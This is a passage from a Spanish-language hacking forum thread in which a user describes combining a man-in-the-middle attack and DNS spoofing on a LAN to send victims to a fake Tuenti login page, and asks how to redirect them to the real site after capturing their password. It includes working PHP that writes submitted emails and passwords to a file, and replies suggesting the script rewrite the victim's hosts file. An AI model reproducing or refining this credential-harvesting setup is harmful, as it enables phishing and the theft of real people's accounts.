[SOLUCIONADO] Realizando MITM Y DNS SPOOFING, todo correpto pero una duda.

Iniciado por krraskl13, Octubre 11, 2012, 05:28:55 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Octubre 11, 2012, 05:28:55 PM Ultima modificación: Octubre 07, 2014, 09:55:49 PM por Expermicid
Hola necesito que alguien me ayude,  he realizado un MITM en mi LAN y lo he conseguido todo con exito, y luego realice un scam de tuenti para probar lo subi a un servidor Apache a traves de XAMPP y lleve a cabo un DNS SPOOFING, y esto tambien lo consigo con exito.
Mi problema es que cuando redirecciona a mi pagina e introduce el user y el pass, se supone que el .PHP recarga la pagina de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta pero claro esta a su vez es redireccionada otra vez a mi pagina(fake), mi pregunta es que si hay alguna forma de que despues de obtener yo el password redireccione ya a la pagina de tuenti original. Yo lo que habia pensado es que en el codigo del .PHP pusiera que recargue la pagina No tienes permitido ver los links. Registrarse o Entrar a mi cuenta entonces así no rediccionaria el dns spoof a mi fake, pero mi sorpresa fue que no que vuelve a redireccionar a mi fake y de ahi no sale. Espero que hayan entendido mi problema. Aqui dejo el codigo del .PHP

Código: php
<?php
$user=$_POST['email'];
$pass=$_POST['input_password'];

$fichero = fopen('users.txt', 'a');

fwrite($fichero,'Usuario:'.$user);

fwrite($fichero,chr(13).chr(10));
fwrite($fichero,'Password:'.$pass);
fwrite($fichero,chr(13).chr(10));
fwrite($fichero,'_______________________');
fwrite($fichero,chr(13).chr(10));
echo "<META HTTP-EQUIV='refresh' CONTENT='1; url=http://www.tuenti.com/?m=login'>";
?>


Alguien me ayuda ??? Gracias!!:)

solucion definitiva cambiar nuevamente las modificaciones del hosts.

O.. probar redireccionar a la IP de la web de tuenti

Voy a probar con la Ip de la pagina y digo los resultados, alguna solucion para hacer lo del host automaticamente ??

claro man q hay solucion para lo del host.

Si te fijas bien en tu codigo tenes la solucion, la variable FOPEN, lo habris y haces lo tuyo.

saludos

Buenas amigos, haber he probado con la ip de tuenti, pero me ocurre lo mimo vuelve a redirigirme a la pagina fake que esta alojada en mi servidor apache, como seria modificar el php para que modificara su host, esque no tengo mucho conocimiento .PHP?? eso lo detectaria su pc.. Alguna solucion otra soluion ??

Gracias por vuestro tiempo!! ;)